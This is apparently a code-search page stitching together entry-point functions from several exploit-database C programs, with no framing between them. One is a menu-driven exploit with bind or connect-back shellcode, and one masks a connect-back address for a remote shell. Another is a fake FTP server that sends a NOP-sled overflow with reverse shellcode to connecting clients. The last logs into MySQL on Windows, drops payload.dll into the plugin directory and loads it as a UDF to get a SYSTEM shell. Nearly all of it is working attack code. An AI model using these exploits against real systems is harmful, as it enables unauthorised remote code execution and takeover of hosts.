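/*
 * Entry point: connect to the target, let the operator pick a shellcode
 * variant, run the exploit and hand off to the matching shell handler.
 *
 * argc/argv go straight to parse_arguments(), which fills myargs (target
 * ip/port, local ip, target index); its option syntax is defined elsewhere
 * in this file.
 *
 * Returns 0 after a normal run; exits with status 1 on unreadable or invalid
 * menu input and on a failed exploit attempt.
 */
int
main ( int argc, char* argv[] )
{
	int s;
	int option = -1;	/* stays invalid unless scanf() really stores a value */
	args myargs;

	/* cosmetic screen clear; this goes through a shell, so the argument
	 * must remain a fixed literal */
	system ( "clear" );
	header ();
	parse_arguments ( argc, argv, &myargs );
	s = connect_to_remote_host ( myargs.tip, myargs.tport );

	printf ( "--[ select shellcode\n" );
	printf ( "     |\n" );
	printf ( "     |- [0] bind\n" );
	printf ( "     `- [1] cb\n" );
	printf ( ">> " );
	fflush ( stdout );	/* the prompt has no newline; make sure it is shown */
	/* an unchecked scanf() leaves 'option' untouched on non-numeric input,
	 * and the switch below would then branch on an indeterminate value */
	if ( scanf ( "%d", &option ) != 1 )
	{
		printf ( "--[ invalid shellcode!\n" );
		close ( s );
		exit ( 1 );
	}
	switch ( option )
	{
		case 0:
			/* bind variant is not wired up; the intended flow was
			 * exploit(s, smashaddr, writeaddr, NULL) followed by
			 * connect_to_bindshell(myargs.tip, 3879) */
			printf ( "--[ sorry, does not work yet :/\n" );
			break;
		case 1:
			printf ( "--[ using cb shellcode\n" );
			/* exploit() reports failure with a return value of 1 */
			if ( exploit ( s, target[myargs.target].smashaddr, target[myargs.target].writeaddr, myargs.lip ) == 1 )
			{
				printf ( "exploitation failed!\n" );
				close ( s );
				exit ( 1 );
			}
			/* wait for the connect-back on the port the cb shellcode uses */
			start_reverse_handler ( 45295 );
			break;
		default:
			printf ( "--[ invalid shellcode!\n" );
			close ( s );
			exit ( 1 );
	}
	close ( s );
	return 0;
}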
ファイル: 883.c プロジェクト: ALurker/exploit-database
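/*
 * Entry point for the 883.c exploit.
 *
 *   <host>                                      bind-shell variant, shell on 4444
 *   <host> <connectback ip> <connectback port>  reverse-shell variant
 *
 * The connect-back ip/port are XOR-masked (0x99999999 / 0x9999) before being
 * handed to exploit(); presumably the shellcode unmasks them again — confirm
 * against the shellcode definition, which lives outside this function.
 *
 * Exits with status 1 on bad usage, an unparsable connect-back address or
 * port, resolution/connect failure or a failed exploit; returns 0 otherwise.
 */
int
main ( int argc, char* argv[] )
{
	int s;
	unsigned long xoredip;
	unsigned short xoredcbport;
	struct sockaddr_in remote_addr;
	struct hostent *host_addr;

	if ( argc != 2 && argc != 4 )
	{
		fprintf ( stderr, "\nUsage\n-----\n[ Bindshell    ] %s <host>\n[ Reverseshell ] %s <host> <connectback ip> <connectback port>\n\n", argv[0], argv[0] );
		exit ( 1 );
	}

	if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL )
	{
		fprintf ( stderr, "cannot resolve \"%s\"\n", argv[1] );
		exit ( 1 );
	}
	/* zero the whole struct so sin_zero does not carry stack garbage */
	memset ( &remote_addr, 0, sizeof ( remote_addr ) );
	remote_addr.sin_family = AF_INET;
	memcpy ( &remote_addr.sin_addr, host_addr->h_addr, sizeof ( remote_addr.sin_addr ) );
	remote_addr.sin_port   = htons ( PORT );

	system ( "clear" );	/* cosmetic; fixed literal, never user input */
	header ();

	if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
	{
		printf ( "socket failed!\n" );
		exit ( 1 );
	}

	printf ( "--[ connecting to %s:%u...", argv[1], PORT  );
	if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ==  -1 )
	{
		printf ( "failed!\n" );
		exit ( 1 );
	}
	printf ( YELLOW "done!\n" NORMAL);

	if ( argc == 4 )
	{
		in_addr_t cbip;
		char *end;
		long cbport;

		/* inet_addr() reports a malformed address as INADDR_NONE; the
		 * original passed that straight into the shellcode */
		cbip = inet_addr ( argv[2] );
		if ( cbip == INADDR_NONE )
		{
			fprintf ( stderr, "invalid connectback ip \"%s\"\n", argv[2] );
			exit ( 1 );
		}
		/* strtol instead of atoi so junk and out-of-range ports are rejected
		 * rather than silently truncated by htons() */
		errno = 0;
		cbport = strtol ( argv[3], &end, 10 );
		if ( end == argv[3] || *end != '\0' || errno == ERANGE || cbport < 1 || cbport > 65535 )
		{
			fprintf ( stderr, "invalid connectback port \"%s\"\n", argv[3] );
			exit ( 1 );
		}
		xoredip = cbip ^ 0x99999999UL;
		xoredcbport = htons ( ( unsigned short ) cbport ) ^ ( unsigned short ) 0x9999;
		if ( exploit ( s, xoredip, xoredcbport, 0 ) == 1 )
		{
			printf ( "exploitation FAILED!\n" );
			exit ( 1 );
		}
		start_reverse_handler ( argv[3] );
	}
	else
	{
		/* bind variant: no connect-back parameters, last argument selects it */
		if ( exploit ( s, 0UL, ( unsigned short ) 0, 1 ) == 1 )
		{
			printf ( "exploitation FAILED!\n" );
			exit ( 1 );
		}
		connect_to_bindshell ( argv[1], 4444 );
	}
	close ( s );
	return 0;
}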
ファイル: 711.c プロジェクト: AlexxNica/exploit-database
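/* Write one canned reply on the control connection. A failed or zero-length
 * write is fatal, which is how every command branch treated it. */
static void
send_reply ( int s, const char* msg )
{
	if ( write ( s, msg, strlen ( msg ) ) <= 0 )
	{
		printf ( RED "\twrite failed!\n" NORMAL );
		exit ( 1 );
	}
}

/*
 * Minimal fake FTP server loop that delivers the client-side overflow.
 *
 * s  : control connection to the victim client; commands come from get_cmd()
 * s2 : data connection (valid only after PASV has been handled)
 * ip : dotted-quad address advertised in the PASV reply; it is copied before
 *      tokenising, so the caller's string is left intact
 *
 * PWD/CWD/TYPE get canned replies, PASV opens a listening data socket on port
 * PASV and recurses with the accepted data connection, and LIST writes the
 * overflow buffer (head + NOP sled + short jmp + return address + NOP pad +
 * reverseshell) to the data connection before starting the reverse handler.
 * Never returns normally: every failure path exits(1).
 */
void
handle_cmd ( int s, int s2, char* ip )
{
	int listenfd, connfd;
	unsigned int ret = 0x77ea5794;		/* edx eax ret in kernel32.dll; 4 bytes are appended */
	char* cmd;
	char out[128], buffer[1024];
	socklen_t clilen;
	struct sockaddr_in cliaddr, servaddr;

	while ( 1 )
	{
		cmd = get_cmd ( s );
		/* get_cmd() is defined elsewhere; if it can hand back NULL on a
		 * closed control connection this keeps strncmp() off a null pointer */
		if ( cmd == NULL )
		{
			printf ( RED "control connection closed!\n" NORMAL );
			exit ( 1 );
		}
		if ( strncmp ( cmd, "PWD", 3 ) == 0 )
		{
			send_reply ( s, "257 \"/\" is current directory.\r\n" );
		}
		else if ( strncmp ( cmd, "CWD", 3 ) == 0 )
		{
			/* same 257 reply as PWD, kept as in the original */
			send_reply ( s, "257 \"/\" is current directory.\r\n" );
		}
		else if ( strncmp ( cmd, "TYPE", 4 ) == 0 )
		{
			send_reply ( s, "200 Type set to A..\r\n" );
		}
		else if ( strncmp ( cmd, "PASV", 4 ) == 0 )
		{
			char ipcopy[32];
			char* octet[4] = { NULL, NULL, NULL, NULL };
			char* tok;
			int n = 0;

			/* strtok() writes into its argument: tokenise a private copy so
			 * the caller's string survives and a second PASV still works.
			 * The original stored the token pointers in an int[4], which both
			 * truncates pointers on 64-bit and overflowed on the 5th store. */
			snprintf ( ipcopy, sizeof ( ipcopy ), "%s", ip );
			tok = strtok ( ipcopy, "." );
			while ( tok != NULL && n < 4 )
			{
				octet[n++] = tok;
				tok = strtok ( NULL, "." );
			}
			if ( n != 4 || tok != NULL )
			{
				printf ( RED "bad connectback ip \"%s\" (need a.b.c.d)\n" NORMAL, ip );
				exit ( 1 );
			}
			/* 122,105 encodes data port 122*256+105 = 31337; presumably PASV
			 * below is defined to the same value — confirm */
			snprintf ( out, sizeof ( out ), "227 Entering Passive Mode. (%s,%s,%s,%s,122,105).\r\n", octet[0], octet[1], octet[2], octet[3] );
			send_reply ( s, out );
			printf ( "--[ entering passive mode...\n" );
			if ( ( listenfd = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
			{
				printf ( RED "socket failed!\n" NORMAL );
				exit ( 1 );
			}
			memset ( &servaddr, 0, sizeof ( servaddr ) );
			servaddr.sin_family = AF_INET;
			servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
			servaddr.sin_port = htons ( PASV );
			/* an unchecked bind() would let listen() succeed on an ephemeral
			 * port the client was never told about */
			if ( bind ( listenfd, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) ) == -1 )
			{
				printf ( RED "bind failed!\n" NORMAL );
				exit ( 1 );
			}
			if ( listen ( listenfd, 1 ) == -1 )
			{
				printf ( RED "listen failed!\n" NORMAL );
				exit ( 1 );
			}
			clilen = sizeof ( cliaddr );
			if ( ( connfd = accept ( listenfd, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
			{
				close ( listenfd );
				printf ( RED "accept failed!\n" NORMAL );
				exit ( 1 );
			}
			close ( listenfd );
			printf ( "--[" GREEN " passive connection established!\n" NORMAL );
			/* continue serving the control connection with the data socket
			 * attached; ip is passed on (the original passed an empty buffer) */
			handle_cmd ( s, connfd, ip );
		}
		else if ( strncmp ( cmd, "LIST", 4 ) == 0 )
		{
			size_t pktlen;

			printf ( "--[" GREEN " user is trying to use \"LIST\" command\n" NORMAL );
			printf ( "--[ w00d w00d, let`s kick his ass...\n" );
			/* payload layout (byte offsets into buffer):
			 *   0    head              sizeof(head)-1 bytes, expected to be 68
			 *   68   0x90 NOP sled     255 bytes
			 *   321  "\xeb\x46"        jmp +0x46: 323 + 0x46 = 393, the shellcode
			 *   323  ret               appended at the first NUL (right after the jmp)
			 *   327  0x90 NOP pad      66 bytes
			 *   393  reverseshell
			 * followed by CRLF. The strncat() placement of ret assumes head is
			 * exactly 68 bytes with no NUL byte inside — confirm against head. */
			if ( 393 + ( sizeof ( reverseshell ) - 1 ) + 2 >= sizeof ( buffer ) )
			{
				printf ( RED "payload does not fit in the send buffer!\n" NORMAL );
				exit ( 1 );
			}
			memset ( buffer, 0, sizeof ( buffer ) );
			memcpy ( buffer, head, sizeof ( head ) - 1 );
			memset ( buffer + 68, 0x90, 255 );
			memcpy ( buffer + 321, "\xeb\x46", 2 );
			strncat ( buffer, ( const char * ) &ret, 4 );
			memset ( buffer + 327, 0x90, 66 );
			memcpy ( buffer + 393, reverseshell, sizeof ( reverseshell ) - 1 );
			strcat ( buffer, "\r\n" );
			pktlen = strlen ( buffer );
			send_reply ( s, "150 Here comes the directory listing.\r\n" );
			printf ( "--[ sending packet [ %zu bytes ]...", pktlen );
			if ( write ( s2, buffer, pktlen ) <= 0 )
			{
				printf ( RED "\twrite failed!\n" NORMAL );
				exit ( 1 );
			}
			printf ( GREEN "done!\n" NORMAL);
			printf ( "--[ confirming..." );
			send_reply ( s, "226 Transfer ok\r\n" );
			printf ( GREEN "done!\n" NORMAL);
			close ( s2 );
			start_reverse_handler ( argv3 );
		}
		else
		{
			send_reply ( s, "550 command not supported\r\n" );
		}
	}
}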
ファイル: 56772_0.c プロジェクト: B-Rich/osf_db
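/*
 * Entry point for the MySQL-on-Windows post-auth UDF exploit.
 *
 * Flow: log in with the supplied credentials, stage payload.dll as a LONGBLOB
 * row in a scratch database, write it into the server's plugin_dir with
 * SELECT ... INTO DUMPFILE, then (in a forked child) load it with CREATE
 * FUNCTION while the parent waits for the connect-back on port 443.
 *
 * Options: -u user, -p password, -t host; all three are required (usage()
 * is called otherwise). Reads payload.dll from the current directory.
 * Returns 0 from the parent after the handler returns; every failure exits(1).
 */
int main(int argc, char *argv[])
{
  MYSQL *c;
  char *target = NULL;
  char *username = NULL;
  char *password = NULL;
  char *payload = NULL;
  char *payload2 = NULL;
  char *thequery = NULL;
  const char *insert_tmpl = "INSERT INTO spearhead(weapon) VALUES('%s')";
  char *dump = NULL;
  MYSQL_ROW plugin_dir;
  FILE *input = NULL;
  long size = -1;
  int j;
  unsigned int querylen, randno;
  size_t querycap;
  MYSQL_RES *result;
  pid_t pid;

  printf("Oracle MySQL Windows SYSTEM Level Exploit (post-auth) zeroday\n""Copyright (C) 2012 Kingcope\n");

  while ((j = getopt(argc, argv, "u:p:t:")) != -1) {
    switch (j) {
      case 'u':
        username = optarg;
        break;
      case 'p':
        password = optarg;
        break;
      case 't':
        target = optarg;
        break;
      default:
        usage(argv);
    }
  }

  if (username == NULL || password == NULL || target == NULL) usage(argv);

  c = mysql_init(NULL);
  if (c == NULL) {
    /* no handle yet, so mysql_errno(c)/mysql_error(c) must not be called */
    printf("Error: mysql_init failed (out of memory)\n");
    exit(1);
  }

  if (mysql_real_connect(c, target, username,
          password, "mysql", 0, NULL, 0) == NULL) {
    printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
    exit(1);
  }

  printf("Successfully Logged into MySQL Server\n""Att3mpt to R00T the b0x!\n");

  /* scratch database/table; the "doesn't exist"/"already exists" errors
   * (1008 ER_DB_DROP_EXISTS, 1007 ER_DB_CREATE_EXISTS, 1050
   * ER_TABLE_EXISTS_ERROR) are tolerated so a rerun after a crash works */
  if (mysql_query(c, "drop database spearhead") && (mysql_errno(c) != 1008)) {
    printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
    exit(1);
  }

  if (mysql_query(c, "create database spearhead") && (mysql_errno(c) != 1007)) {
    printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
    exit(1);
  }

  if (mysql_query(c, "use spearhead")) {
    printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
    exit(1);
  }

  if (mysql_query(c, "create table spearhead(weapon LONGBLOB)") && (mysql_errno(c) != 1050)) {
    printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
    exit(1);
  }

  /* read-only is enough; "r+b" demanded write access to the DLL */
  input = fopen("payload.dll", "rb");
  if (input == NULL) {
    printf("Error: Could not open payload.dll\n");
    exit(1);
  }

  fseek(input, 0L, SEEK_END);
  size = ftell(input);
  /* an empty file would make fread() below report failure anyway; say why */
  if (size <= 0) {
    printf("Error: Could not retrieve filesize of payload.dll (or it is empty)\n");
    exit(1);
  }
  fseek(input, 0L, SEEK_SET);
  payload = malloc((size_t)size);
  if (payload == NULL) {
    printf("Error: Could not allocate memory\n");
    exit(1);
  }

  if (fread(payload, (size_t)size, 1, input) < 1) {
    printf("Error: Could not read payload.dll\n");
    exit(1);
  }
  fclose(input);

  /* mysql_real_escape_string() needs 2*len+1 bytes of output space */
  payload2 = malloc((size_t)size * 2 + 1);
  if (payload2 == NULL) {
    printf("Error: Could not allocate memory\n");
    exit(1);
  }

  mysql_real_escape_string(c, payload2, payload, (unsigned long)size);

  /* template (its "%s" is replaced) + escaped blob + NUL; the escaped form
   * contains no NUL bytes, so feeding it through %s is safe */
  querycap = (size_t)size * 2 + strlen(insert_tmpl) + 2;
  thequery = malloc(querycap);
  if (thequery == NULL) {
    printf("Error: could not allocate buffer\n");
    exit(1);
  }
  querylen = (unsigned int)snprintf(thequery, querycap, insert_tmpl, payload2);

  if (mysql_real_query(c, thequery, querylen)) {
    printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
    exit(1);
  }
  free(thequery);
  free(payload2);
  free(payload);

  dump = malloc(4096);
  if (dump == NULL) {
    printf("Error: could not allocate buffer\n");
    exit(1);
  }

  /* plugin_dir with '/' turned into '\' and every '\' doubled, so it can be
   * embedded in the single-quoted DUMPFILE path below */
  if (mysql_query(c, "SELECT REPLACE(REPLACE(@@plugin_dir, '/', '\\\\') ,'\\\\', '\\\\\\\\')")) {
    printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
    exit(1);
  }
  result = mysql_store_result(c);
  if (result == NULL) {
    printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
    exit(1);
  }
  plugin_dir = mysql_fetch_row(result);
  /* the original dereferenced plugin_dir[0] without either check */
  if (plugin_dir == NULL || plugin_dir[0] == NULL) {
    printf("Error: could not read @@plugin_dir\n");
    exit(1);
  }

  srandom(time(NULL));
  randno = (unsigned int)random();
  printf("Save payload to %s\\payload%u.dll\n", plugin_dir[0], randno);
  querylen = (unsigned int)snprintf(dump, 4096, "SELECT weapon FROM spearhead INTO DUMPFILE '%s\\\\payload%u.dll'", plugin_dir[0], randno);
  if (querylen >= 4096) {
    printf("Error: plugin_dir path too long\n");
    exit(1);
  }
  mysql_free_result(result);   /* plugin_dir pointed into result; done with it */

  if (mysql_real_query(c, dump, querylen)) {
    printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
    exit(1);
  }

  pid = fork();
  if (pid < 0) {
    printf("Error: fork failed\n");
    exit(1);
  }
  if (pid == 0) {
    /* child: give the parent a moment to bring the handler up, then load the
     * DLL as a UDF (this is what runs the payload) and clean up. Both
     * processes share the MySQL socket after fork(); the child must not call
     * mysql_close(), or it would send COM_QUIT underneath the parent. */
    sleep(1);
    snprintf(dump, 4096, "CREATE FUNCTION mysqljackpot RETURNS STRING SONAME 'payload%u.dll'", randno);
    if (mysql_query(c, dump)) {
      printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
      exit(1);
    }

    if (mysql_query(c, "drop database spearhead")) {
      printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
      exit(1);
    }

    if (mysql_query(c, "drop function mysqljackpot")) {
      printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
      exit(1);
    }
    fflush(stdout);
    _exit(0);   /* skip atexit/stdio teardown that belongs to the parent */
  }

  /* parent: wait for the reverse shell, then reap the child */
  start_reverse_handler(443);
  waitpid(pid, NULL, 0);

  printf("Done.\n");
  mysql_close(c);
  free(dump);
  return 0;
}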